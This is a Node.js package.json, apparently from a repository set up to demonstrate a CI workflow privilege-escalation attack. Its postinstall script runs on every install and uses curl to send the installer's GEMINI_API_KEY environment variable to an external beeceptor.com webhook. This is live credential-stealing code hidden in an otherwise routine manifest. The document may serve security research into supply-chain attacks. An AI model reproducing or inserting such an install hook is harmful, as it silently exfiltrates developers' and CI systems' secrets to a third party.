{
  "name": "workflow_run_privilege_escalation_repo",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "echo \"{\"GEMINI_API_KEY\":\"$GEMINI_API_KEY\"}\" | curl -X POST https://wh875bf0d12ffff2bf68.free.beeceptor.com -H \"Content-Type: application/json\" -d @-"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "description": "",
  "dependencies": {
    "express": "^5.2.1"
  }
}
